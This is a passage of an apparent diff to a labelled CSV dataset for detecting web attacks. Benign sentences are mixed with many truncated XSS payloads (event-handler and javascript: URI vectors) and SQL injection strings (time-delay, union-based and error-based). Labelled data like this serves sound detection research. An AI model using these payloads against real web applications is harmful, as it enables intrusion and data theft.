onpaste=""alert(1)"" contenteditable>test</hea",1,XSS,3817 +"<strong draggable=""true"" ondragend=""alert(1)"">test",1,XSS,8324 +"<tfoot onkeydown=""alert(1)"" contenteditable>test</",1,XSS,3158 +1'|| ( select 'yuku' where 7480 = 7480,2,SQLi,14299 +"<dir draggable=""true"" ondragend=""alert(1)"">test</d",1,XSS,2280 +<hr onfocusout=alert(1) tabindex=1 id=x></hr><inpu,1,XSS,4602 <audio controls ondurationchange=alert(1)><source ,1,XSS,14 -"<;IMG&#x0D;SRC&#x0D;=&#x0D;"";&#x0D;j&#x0D;a&#x0D;v",1,XSS,1647 -"1"" ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,17910 -<template onblur=alert(1) tabindex=1 id=x></templa,1,XSS,2366 -"<html draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,4649 -"-9087"" order by 1#",2,SQLi,12198 +"perl -e ';print "";<;IM SRC=java\0script:alert("";XS",1,XSS,1648 +"-2289"" ) or 8624 = 6279 and ( ""ised"" = ""ised",2,SQLi,17912 +"<div oncopy=""alert(1)"" contenteditable>test</div>",1,XSS,2367 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4651 +"-3707"" ) ) ) or 8571 = 8571--",2,SQLi,12200 <script onReadyStateChange script onReadyStateChan,1,XSS,375 -So why would he suddenly want her to select the cl,0,normal,25538 -Update the post.,0,normal,22862 +Some adult individuals believe that a gift card me,0,normal,25535 +Delete the app.,0,normal,22864 "<a href=""\x12javascript:javascript:alert(1)"" id=""f",1,XSS,526 -"<div id=""41""><li style=list-style:url() onerror=al",1,XSS,9132 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11562 -1%' or 4411 = ( select count ( * ) from sysusers a,2,SQLi,13911 -"1%"" ) ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97",2,SQLi,12766 -Group data where needed.,0,normal,23280 -"1%"" ) ) and 4241 = convert ( int, ( select char ( ",2,SQLi,19976 -Select the correct answer.,0,normal,24289 -1%' ) and sleep ( 5 ) and ( '%' = ',2,SQLi,19343 +"<div id=""43""><?xml version=""1.0"" standalone=""no""?>",1,XSS,9134 +""" ) ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11564 +1'|| ( select 'setd' from dual where 3686 = 3686 (,2,SQLi,13913 +"1"" and ( select 9067 from ( select count ( * ) ,co",2,SQLi,12768 +Locate items where applicable.,0,normal,23282 +1 ) ) as krzi where 8727 = 8727 or 8315 = ( select,2,SQLi,19978 +Select the ideal spot.,0,normal,24291 +"waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,19345 "<a href=""\x15javascript:javascript:alert(1)"" id=""f",1,XSS,530 -1 ) and 3754 = ( select upper ( xmltype ( chr ( 60,2,SQLi,15597 -1' ) ) and 3355 = 6012 and ( ( 'ofmy' = 'ofmy,2,SQLi,20099 --8010' or ( 2225 = 8491 ) *8491 and 'eipf' = 'eipf,2,SQLi,21117 -"</title><script>$=1,\u0061lert($)</script>",1,XSS,9462 -1' ) ) ) and 6537 = dbms_pipe.receive_message ( ch,2,SQLi,12474 -"1' union all select null,null,null,null,null,null-",2,SQLi,17779 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,12202 -"1"" ) ) and ( select 9067 from ( select count ( * )",2,SQLi,12583 -1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11172 +1'|| ( select 'znba' where 8323 = 8323,2,SQLi,15599 +"elt ( 2567 = 9921,9921 )",2,SQLi,20101 +select ( case when ( 5847 = 2826 ) then 5847 else ,2,SQLi,21119 +</title><</script/script><script ~~~>\u0061lert(1),1,XSS,9464 +"1"" and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ",2,SQLi,12476 +"1"" ) where 8657 = 8657",2,SQLi,17781 +"1"" ) ) as vbpl where 3885 = 3885 and 6969 = ( sele",2,SQLi,12204 +1'+ ( select 'vwzp' where 2729 = 2729 or 7427 = db,2,SQLi,12585 +AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ,2,SQLi,11174 "{""id"":null,""firstName"":""Natasha"",""lastName"":""Gouw""",0,normal,27427 -"select * from users where id = 1 or @#"" ( = 1 unio",2,SQLi,12004 -"1"" ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4",2,SQLi,22016 -"<style>@keyframes x{}</style><details style=""anima",1,XSS,6564 -"<time draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,4704 -"1"" where 7245 = 7245 and 9198 = 9198--",2,SQLi,15283 --7442 ) or 3391 = 7492,2,SQLi,18097 -"1"" ( select ( case when ( 5451 = 5451 ) then regex",2,SQLi,15922 -"{""id"":null,""firstName"":""Rajkumar"",""lastName"":""Raj""",0,normal,27285 +select * from users where id = '1' or \.<$ union s,2,SQLi,12006 +-2129' ) or 2724 in ( ( char ( 113 ) +char ( 113 ),2,SQLi,22018 +"<ins onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,6566 +<content id=x tabindex=1 onfocus=alert(1)></conten,1,XSS,4706 +"1' and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,15285 +1 ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,18099 +1'+ ( select nzij where 5456 = 5456 and row ( 6237,2,SQLi,15924 +"{""id"":null,""name"":""affect""}",0,normal,27283 <input onblur=write(XSS) autofocus><input autofocu,1,XSS,956 -<strike onpointerdown=alert(1)>XSS</strike>,1,XSS,6676 -"<script oncopy=""alert(1)"" contenteditable>test</sc",1,XSS,3454 -"1' ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d",2,SQLi,12804 -"-3862' ) ) union all select 2495,2495,2495,2495,24",2,SQLi,15141 -"<content draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,8596 -"<applet onkeydown=""alert(1)"" contenteditable>test<",1,XSS,2072 +<picture onpointerover=alert(1)>XSS</picture>,1,XSS,6678 +"<isindex ondblclick=""alert(1)"">test</isindex>",1,XSS,3456 +1' ) as xiqw where 8507 = 8507 rlike sleep ( 5 ) -,2,SQLi,12806 +1' ) and ( 3020 = 3020 ) *6703 and ( 'rskq' = 'rsk,2,SQLi,15143 +"<footer onkeypress=""alert(1)"" contenteditable>test",1,XSS,8598 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2073 <body onscroll=alert(XSS)><br><br><br><br><br><br>,1,XSS,957 -"1%' ) ) and elt ( 4249 = 4249,7259 ) and ( ( '%' =",2,SQLi,16543 --8409 ) ) as ipbz where 9984 = 9984 or 3371 = 3869,2,SQLi,14037 -"<samp onmouseout=""alert(1)"">test</samp>",1,XSS,7006 +-9556' ) where 2472 = 2472 or ( 2883 = 9968 ) *996,2,SQLi,16545 +"1"" ) where 4822 = 4822 union all select null,null,",2,SQLi,14039 +"<style>@keyframes x{}</style><div style=""animation",1,XSS,7008 "<script\x20type=""text/javascript"">javascript:alert",1,XSS,353 -1'|| ( select 'miew' where 8360 = 8360 waitfor del,2,SQLi,13519 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,22463 -1 ) as adzj where 5575 = 5575 or 8421 = ( select c,2,SQLi,16310 -<strong onpointerenter=alert(1)>XSS</strong>,1,XSS,6237 --3088' or 6872 = 6872 and 'miwk' = 'miwk,2,SQLi,12733 -<style>@keyframes slidein {}</style><optgroup styl,1,XSS,8947 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14026 -"Following Oli's victory, Hartlepool Respect are me",0,normal,26183 -"<tbody onpaste=""alert(1)"" contenteditable>test</tb",1,XSS,2921 -Select your fashion.,0,normal,24888 -"1%"" ) ) ) or 5356 = ( select count ( * ) from sysu",2,SQLi,15712 -"<dir onkeyup=""alert(1)"" contenteditable>test</dir>",1,XSS,4645 +1' where 2547 = 2547 and 6969 = ( select 6969 from,2,SQLi,13521 +1%' ) and 8734 = 5844,2,SQLi,22465 +select ( case when ( 8350 = 7872 ) then 8350 else ,2,SQLi,16312 +"<link onmouseup=""alert(1)"">test</link>",1,XSS,6239 +"1 ) where 1443 = 1443 union all select null,null,n",2,SQLi,12735 +"<rb onkeyup=""alert(1)"" contenteditable>test</rb>",1,XSS,8949 +"1"" where 2309 = 2309 or elt ( 5873 = 5873,sleep ( ",2,SQLi,14028 +For control select a disinfectant with proven acti,0,normal,26180 +"<ruby onmousedown=""alert(1)"">test</ruby>",1,XSS,2922 +Select your look.,0,normal,24890 +1 ) ) as hqwy where 4433 = 4433 or exp ( ~ ( selec,2,SQLi,15714 +<pre onpointermove=alert(1)>XSS</pre>,1,XSS,4647 "<img \x39src=x onerror=""javascript:alert(1)"">",1,XSS,662 -1'|| ( select 'uyfo' where 1236 = 1236 or 5286 = (,2,SQLi,16083 -"<select oncontextmenu=""alert(1)"">test</select>",1,XSS,7058 -union select * from users where login = char ...,2,SQLi,10182 -"1"" ) as yzzk where 1813 = 1813 and ( 3020 = 3020 )",2,SQLi,20050 -Select your dream engagement ring.,0,normal,24364 -"-4285' ) ) ) union all select 8819,8819,8819,8819,",2,SQLi,16691 -<code onpointerup=alert(1)>XSS</code>,1,XSS,4791 -<datalist onpointerenter=alert(1)>XSS</datalist>,1,XSS,2357 -select * from users where id = 1.%@ union select 1,2,SQLi,11895 -1'+ ( select 'mtpt' where 7483 = 7483 union all se,2,SQLi,18312 -"{""id"":null,""firstName"":""Aini"",""lastName"":""Md Yusof",0,normal,27152 -1 or exp ( ~ ( select * from ( select concat ( 0x7,2,SQLi,19812 -These are select peaches.,0,normal,25326 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20023 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,17651 -1' ) as twny where 9580 = 9580,2,SQLi,13613 -"<script>document.write(""<SCRI"");</SCRIPT>PT SRC=""h",1,XSS,1561 -select * from users where id = 1. <@ union select ,2,SQLi,11788 -ORDER BY 23,2,SQLi,10327 -"<mark oncut=""alert(1)"" contenteditable>test</mark>",1,XSS,7180 --3062' ) ) or 6872 = 6872 and ( ( 'uzth' like 'uzt,2,SQLi,15350 -"1"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ch",2,SQLi,15314 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,13259 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4110 -Select a technique for painting.,0,normal,24252 -1' in boolean mode ) or 4915 = ( select count ( * ,2,SQLi,21289 -Where's the perfect spot to relax and unwind?,0,normal,23679 +1 ) where 8302 = 8302 or 2633 = dbms_pipe.receive_,2,SQLi,16085 +<meter id=x tabindex=1 onfocusin=alert(1)></meter>,1,XSS,7060 +0.28,2,SQLi,10184 +-7600' or 7684 = 3181#,2,SQLi,20052 +Carefully select your guests.,0,normal,24366 +1' ( select ( case when ( 4587 = 4587 ) then regex,2,SQLi,16693 +<sup onpointerover=alert(1)>XSS</sup>,1,XSS,4793 +<applet onpointerenter=alert(1)>XSS</applet>,1,XSS,2358 +select * from users where id = '1' union select \.,2,SQLi,11897 +"1%"" ) or 7552 = ( select count ( * ) from rdb$fiel",2,SQLi,18314 +"{""id"":null,""name"":""MirageGaogamon""}",0,normal,27150 +1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch,2,SQLi,19814 +there was an attempt to select something,0,normal,25328 +"1%"" ) procedure analyse ( extractvalue ( 9255,conc",2,SQLi,20025 +"1"" ) where 1870 = 1870 union all select null,null,",2,SQLi,17653 +1' ) ) ) ( select ( case when ( 5451 = 5451 ) then,2,SQLi,13615 +"<div style=""binding: url(http://www.securitycompas",1,XSS,1562 +select * from users where id = 1 + \+*$ union sele,2,SQLi,11790 +ORDER BY 25,2,SQLi,10329 +<style>@keyframes slidein {}</style><bgsound style,1,XSS,7182 +"-1370' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( (",2,SQLi,15352 +1' ) ) as peeo where 5356 = 5356 and elt ( 4722 = ,2,SQLi,15316 +"1%' union all select null,null,null,null,null,null",2,SQLi,13261 +"<ins onmouseout=""alert(1)"">test</ins>",1,XSS,4112 +Select the right playlist for the mood.,0,normal,24254 +1 ) ) as ipfy where 1189 = 1189,2,SQLi,21291 +She picked up a map from the tourist center.,0,normal,23681 "<a href=""\x1Djavascript:javascript:alert(1)"" id=""f",1,XSS,515 <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&,1,XSS,895 -"<ol onmouseup=""alert(1)"">test</ol>",1,XSS,8602 -"1"" where 2221 = 2221 and 5318 = 8398--",2,SQLi,16406 +"<a onmouseenter=""alert(1)"">test</a>",1,XSS,8604 +-7742 ) as tgzq where 7842 = 7842 or 2062 = 1563,2,SQLi,16408 "{""id"":null,""firstName"":""Elvin"",""lastName"":""Tan"",""a",0,normal,27538 "<embed code=""http://businessinfo.co.uk/labs/xss/xs",1,XSS,900 "<script src=data:text/javascript;base64,&#x59;&#x5",1,XSS,208 -During the second period of his service in Congres,0,normal,26222 +"Earlier in 2019, Lyft added ""green mode"" in select",0,normal,26219 "<script src=""data:\xD4\x8F,javascript:alert(1)""></",1,XSS,459 -<style>:target {color:red;}</style><ins id=x style,1,XSS,2431 -Select your pet.,0,normal,24827 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13630 -<meter onpointerup=alert(1)>XSS</meter>,1,XSS,3390 -"<abbr onpaste=""alert(1)"" contenteditable>test</abb",1,XSS,3912 -"1', ( select 6825 from ( select count ( * ) ,conca",2,SQLi,21768 -Those that opened after 2010 may select half their,0,normal,25292 +<dl id=x tabindex=1 ondeactivate=alert(1)></dl><in,1,XSS,2432 +Select your view.,0,normal,24829 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,13632 +"<code onmousemove=""alert(1)"">test</code>",1,XSS,3392 +"<div onmouseup=""alert(1)"">test</div>",1,XSS,3914 +1 and 4386 = utl_inaddr.get_host_address ( chr ( 1,2,SQLi,21770 +"This week, we select kumquats, pears, and a mushro",0,normal,25294 "`""'><img src=xxx:x \x00onerror=javascript:alert(1)",1,XSS,553 -1 ) ) as ndrh where 6308 = 6308,2,SQLi,19529 -<output id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,6918 -1 ) ) as rbae where 2049 = 2049 or 6979 = like ( ',2,SQLi,18441 -"<nav oncopy=""alert(1)"" contenteditable>test</nav>",1,XSS,1926 --2823' ) ) or 5663 = 4228 and ( ( 'skgh' like 'skg,2,SQLi,17019 -"<li oncopy=""alert(1)"" contenteditable>test</li>",1,XSS,6083 -Select your identity.,0,normal,24893 -select,0,normal,26633 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,18280 -Select your finish.,0,normal,25004 -"Select and Click on ""Delete"" — you've already clea",0,normal,25647 +"1"" procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,19531 +<img id=x tabindex=1 onbeforeactivate=alert(1)></i,1,XSS,6920 +"-7868"" union all select 1805--",2,SQLi,18443 +<applet onreadystatechange=alert(1)></applet>,1,XSS,1927 +1 ) or 2367 = ( select count ( * ) from rdb$fields,2,SQLi,17021 +"<blockquote draggable=""true"" ondragenter=""alert(1)",1,XSS,6085 +Select your label.,0,normal,24895 +select,0,normal,26630 +"-7258"" ) as wjjr where 2110 = 2110 union all selec",2,SQLi,18282 +Select your accomplish.,0,normal,25006 +"Select Back up system files to the recovery drive,",0,normal,25644 <body ontouchmove=alert(1)>,1,XSS,106 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3042 -"1' ) ) ) union all select null,null,null--",2,SQLi,16370 -);waitfor delay '0:0:5'--,2,SQLi,10362 -"1%' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( '%",2,SQLi,18094 +<noframes id=x tabindex=1 onfocus=alert(1)></nofra,1,XSS,3043 +"1' ) ) ) union all select null,null,null,null,null",2,SQLi,16372 +pg_sleep(5)--,2,SQLi,10364 +1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ,2,SQLi,18096 <xss onpointermove=alert(1) style=display:block>XS,1,XSS,90 -Where's your SQL skill?,0,normal,23399 --2756' where 6156 = 6156 or 4144 = ( select upper ,2,SQLi,15526 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10434 -1 ) and ( select 2* ( if ( ( select * from ( selec,2,SQLi,19559 -"-4639"" ) ) ) or 8550 = 9348",2,SQLi,17302 -Select a workout routine to follow.,0,normal,24218 -1'+ ( select bldn where 8321 = 8321 and 8635 = ( s,2,SQLi,14452 -left,0,normal,23117 -1'+ ( select 'vabj' where 7178 = 7178 union all se,2,SQLi,18334 -1' in boolean mode ) or 8421 = ( select count ( * ,2,SQLi,12237 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,14057 -<nextid id=x tabindex=1 onfocusin=alert(1)></nexti,1,XSS,6369 -"1"" and make_set ( 8262 = 3471,3471 ) and ""wayp"" = ",2,SQLi,16386 -She must select.,0,normal,24417 -"1"" where 7344 = 7344 rlike ( select * from ( selec",2,SQLi,22432 -"<div id=""28"">1<animate/xmlns=urn:schemas-microsoft",1,XSS,9128 -<style>:target {color: red;}</style><abbr id=x sty,1,XSS,8906 -"<hgroup onmouseup=""alert(1)"">test</hgroup>",1,XSS,2721 --5995' ) ) or 6872 = 6872 and ( ( 'pywh' = 'pywh,2,SQLi,16020 -"-5572"" ) union all select 8131,8131#",2,SQLi,13622 -<style>:target {color:red;}</style><multicol id=x ,1,XSS,8784 -1' ) ) ) rlike ( select ( case when ( 5524 = 9582 ,2,SQLi,15823 +Where's your SQL guide?,0,normal,23401 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) ) ",2,SQLi,15528 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10436 +"1%"" ) ) ) rlike sleep ( 5 ) #",2,SQLi,19561 +1 ) as fhvr where 5544 = 5544,2,SQLi,17304 +Select a hairstyle for a transformation.,0,normal,24220 +-7469 ) where 5875 = 5875 or make_set ( 9354 = 935,2,SQLi,14454 +union,0,normal,23119 +"1%"" ) and exp ( ~ ( select * from ( select concat ",2,SQLi,18336 +1'+ ( select 'ljtl' where 1766 = 1766,2,SQLi,12239 +"-3775' ) or 1 group by concat ( 0x7171706a71, ( se",2,SQLi,14059 +"<time onmouseup=""alert(1)"">test</time>",1,XSS,6371 +"1%"" ) or ( select 2* ( if ( ( select * from ( sele",2,SQLi,16388 +Choose and select.,0,normal,24419 +"1 union all select null,null,null,null,null,null,n",2,SQLi,22434 +"<div id=""39""><!-- up to Opera 11.52, FF 3.6.28 -->",1,XSS,9130 +<image src=validimage.png onload=alert(1)>,1,XSS,8908 +<rt onpointerup=alert(1)>XSS</rt>,1,XSS,2722 +"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,16022 +1' in boolean mode ) and 6969 = ( select 6969 from,2,SQLi,13624 +<canvas id=x tabindex=1 ondeactivate=alert(1)></ca,1,XSS,8786 +"-2722"" ) or 4907 = 8126#",2,SQLi,15825 "{""id"":null,""name"":""Simisear""}",0,normal,27363 -1'|| ( select 'fmss' from dual where 7025 = 7025 o,2,SQLi,19502 -"{""id"":null,""firstName"":""Cassia"",""lastName"":""Seah"",",0,normal,26899 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10641 -&#060;,1,XSS,9769 -"1',row ( 7937,5067 ) > ( select count ( * ) ,conca",2,SQLi,13400 -"<datalist onbeforepaste=""alert(1)"" contenteditable",1,XSS,3763 +"-7887' ) union all select 9049,9049,9049,9049,9049",2,SQLi,19504 +"{""id"":null,""firstName"":""Zoe"",""lastName"":""Chan"",""sp",0,normal,26896 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10643 +&#00060;,1,XSS,9771 +-5152' ) ) or 4747 = dbms_utility.sqlid_to_sqlhash,2,SQLi,13402 +"<style>@keyframes x{}</style><base style=""animatio",1,XSS,3765 <script>alert(document.domain)</script>,1,XSS,214 -select ( case when ( 6166 = 3364 ) then 6166 else ,2,SQLi,17163 -"-5903%' ) union all select 8293,8293,8293,8293,829",2,SQLi,19881 -In1831-1832he was select preacher before the Unive,0,normal,25988 -"1' procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,18428 -"<command onkeydown=""alert(1)"" contenteditable>test",1,XSS,8921 -1 where 5266 = 5266 and exp ( ~ ( select * from ( ,2,SQLi,21805 -<div id=x tabindex=1 onactivate=alert(1)></div>,1,XSS,6155 -"<strike onmouseover=""alert(1)"">test</strike>",1,XSS,8358 --7737'|| ( select 'xalo' where 9219 = 9219 union a,2,SQLi,17774 -Select your task.,0,normal,24850 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4168 -"-3316%"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113",2,SQLi,20173 -Select your think.,0,normal,24971 -1' ) and 2577 = 7094,2,SQLi,16968 +1 where 1576 = 1576,2,SQLi,17165 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19883 +"Inspired by Vietnam veterans, it will be shown at ",0,normal,25985 +"-5245"" ) ) ) union all select 8106,8106,8106#",2,SQLi,18430 +"<li draggable=""true"" ondragend=""alert(1)"">test</li",1,XSS,8923 +"1%"" or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c",2,SQLi,21807 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6157 +"<time onkeyup=""alert(1)"" contenteditable>test</tim",1,XSS,8360 +1'+ ( select 'midn' where 2819 = 2819 or 9643 = ( ,2,SQLi,17776 +Select your role.,0,normal,24852 +<figure id=x tabindex=1 onactivate=alert(1)></figu,1,XSS,4170 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,20175 +Select your meditate.,0,normal,24973 +-1587' ) or 8339 = 5540,2,SQLi,16970 "{""id"":null,""firstName"":""Tresa"",""lastName"":""Koh"",""s",0,normal,27500 "{""id"":null,""name"":""mice everything wall""}",0,normal,27598 -waitfor delay '0:0:5' and ( ( 'yjsp' like 'yjsp,2,SQLi,16501 -Modify account.,0,normal,23029 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5110 +-6360' ) as yfrk where 3683 = 3683 union all selec,2,SQLi,16503 +Select gift.,0,normal,23031 +"<label onkeypress=""alert(1)"" contenteditable>test<",1,XSS,5112 "{""id"":null,""name"":""Abra""}",0,normal,27553 -"{""id"":null,""firstName"":""Ong"",""lastName"":""Yn"",""addr",0,normal,27303 -"First, keep in mind that there are other steps you",0,normal,26190 -"<multicol onmouseenter=""alert(1)"">test</multicol>",1,XSS,8713 -<article onpointerleave=alert(1)>XSS</article>,1,XSS,1764 -"-3059 or 1570 = convert ( int, ( select char ( 113",2,SQLi,18260 -"1%"" and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,13548 -"select * from users where id = 1 or ""%&"" or 1 = 1 ",2,SQLi,11537 -1' ) as uqkz where 8482 = 8482 and 8407 = ( select,2,SQLi,15070 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3225 +"{""id"":null,""name"":""cup""}",0,normal,27302 +"First, you select a wallpaper platform — monitor o",0,normal,26187 +"<command oncut=""alert(1)"" contenteditable>test</co",1,XSS,8715 +"<nextid onmousemove=""alert(1)"">test</nextid>",1,XSS,1765 +select ( case when ( 8113 = 8981 ) then 8113 else ,2,SQLi,18262 +( select char ( 113 ) +char ( 113 ) +char ( 112 ) ,2,SQLi,13550 +or 0 = 0 #,2,SQLi,11539 +1' and 3754 = ( select upper ( xmltype ( chr ( 60 ,2,SQLi,15072 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3227 "<a href=""\x0Djavascript:javascript:alert(1)"" id=""f",1,XSS,527 -Select the right lens for the shot.,0,normal,24110 -1'|| ( select 'xjtq' from dual where 5719 = 5719 o,2,SQLi,15252 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19331 -"1"" ) as bllz where 6975 = 6975 and 8148 = like ( '",2,SQLi,20858 -"1"" where 4281 = 4281",2,SQLi,12092 -<menu id=x tabindex=1 onactivate=alert(1)></menu>,1,XSS,5656 -"<mark onmouseleave=""alert(1)"">test</mark>",1,XSS,8885 -<canvas id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,6060 -"1"" ) and 4241 = convert ( int, ( select char ( 113",2,SQLi,17344 -"<bgsound draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,6343 -1'+ ( select hett where 7228 = 7228,2,SQLi,20018 -1%' ) ) and 8594 = ( select 8594 from pg_sleep ( 5,2,SQLi,13998 -"1"" where 9756 = 9756",2,SQLi,17435 -"<details onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,8783 -"print ""<IMG SRC=java\0script:alert(\""\"")>"";' >",1,XSS,8712 -"<i onkeydown=""alert(1)"" contenteditable>test</i>",1,XSS,3381 -<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><in,1,XSS,3677 -"<sub oncopy=""alert(1)"" contenteditable>test</sub>",1,XSS,5777 -But obscurity implies that a meme exists within a ,0,normal,26307 -<header id=x tabindex=1 ondeactivate=alert(1)></he,1,XSS,6574 -1'|| ( select 'gdzt' where 4950 = 4950,2,SQLi,21564 -"<;OBJECT TYPE="";text/x-scriptlet""; DATA="";http://h",1,XSS,1608 -"1"" ) or 6979 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,19995 -"{""id"":null,""firstName"":""Yuen"",""lastName"":""Yun"",""sp",0,normal,27288 -Join fitness.,0,normal,23020 +Select the best lens for photography.,0,normal,24112 +"1%"" ) rlike ( select ( case when ( 7736 = 7642 ) t",2,SQLi,15254 +-3501' ) or 4747 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,19333 +1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ,2,SQLi,20860 +"1"" ) and ( 5452 = 6050 ) *6050 and ( ""ciyc"" like """,2,SQLi,12094 +<progress onblur=alert(1) tabindex=1 id=x></progre,1,XSS,5658 +"<tr onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,8887 +"<map onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,6062 +"1%"" ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ",2,SQLi,17346 +"<textarea oncontextmenu=""alert(1)"">test</textarea>",1,XSS,6345 +"1"" ) ) rlike ( select ( case when ( 8179 = 1246 ) ",2,SQLi,20020 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,14000 +"1 ) and row ( 6237,7469 ) > ( select count ( * ) ,",2,SQLi,17437 +<image onpointerup=alert(1)>XSS</image>,1,XSS,8785 +<basefont onpointerdown=alert(1)>XSS</basefont>,1,XSS,8714 +<keygen autofocus onfocusin=alert(1)>,1,XSS,3383 +<a onpointerdown=alert(1)>XSS</a>,1,XSS,3679 +"<img usemap=#x><map name=""x""><area href onfocusin=",1,XSS,5779 +But the two others are almost (if now not quite) p,0,normal,26304 +<data onpointerover=alert(1)>XSS</data>,1,XSS,6576 +"-5571' union all select 8846,8846,8846,8846,8846,8",2,SQLi,21566 +<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-008,1,XSS,1609 +1'|| ( select 'dsjg' where 2402 = 2402 and 1947 = ,2,SQLi,19997 +"{""id"":null,""firstName"":""Lim"",""lastName"":""Richard"",",0,normal,27286 +Select chair.,0,normal,23022 "{""id"":null,""firstName"":""Florence"",""lastName"":""Ong""",0,normal,27616 -1%' ) ) ) and ( select 9067 from ( select count ( ,2,SQLi,15884 --7164%' or 4747 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,17176 -`'><script>\xE2\x80\x8Bjavascript:alert(528)</scri,1,XSS,8985 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19441 -"1 union all select null,null,null--",2,SQLi,15523 -<style>:target {color:red;}</style><textarea id=x ,1,XSS,1981 -admin' ) or ( '1' = '1'/*,2,SQLi,11426 -"-4032"" ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( ",2,SQLi,19983 -"1"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch",2,SQLi,17318 --8153' ) as qhlb where 4948 = 4948 union all selec,2,SQLi,12156 --3071 ) ) as uiiu where 8910 = 8910 union all sele,2,SQLi,12858 -<summary onfocusout=alert(1) tabindex=1 id=x></sum,1,XSS,7425 -"<link onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,5627 -<;/br style=a:expression(alert())>;,1,XSS,1683 -"1"" ) ) as esho where 8864 = 8864 order by 1--",2,SQLi,16134 -"-4452%"" union all select 7141,7141,7141,7141,7141,",2,SQLi,20564 -1'+ ( select 'iify' where 6257 = 6257 or 6793 = ( ,2,SQLi,16336 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6447 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,20501 +1'|| ( select 'zvpl' where 5877 = 5877 union all s,2,SQLi,15886 +"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,17178 +`'><script>\xE2\x80\xA9javascript:alert(524)</scri,1,XSS,8987 +1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |,2,SQLi,19443 +1' ) or 4411 = ( select count ( * ) from sysusers ,2,SQLi,15525 +<object onpointerleave=alert(1)>XSS</object>,1,XSS,1982 +"select * from users where id = 1 or 1#"". union sel",2,SQLi,11428 +"1"" ) as ghpx where 2873 = 2873 waitfor delay '0:0:",2,SQLi,19985 +select ( case when ( 7385 = 8723 ) then 7385 else ,2,SQLi,17320 +1' ) ) as bedq where 8781 = 8781 or 8466 = benchma,2,SQLi,12158 +1 where 5161 = 5161 and 3754 = ( select upper ( xm,2,SQLi,12860 +"<small oncut=""alert(1)"" contenteditable>test</smal",1,XSS,7427 +<wbr 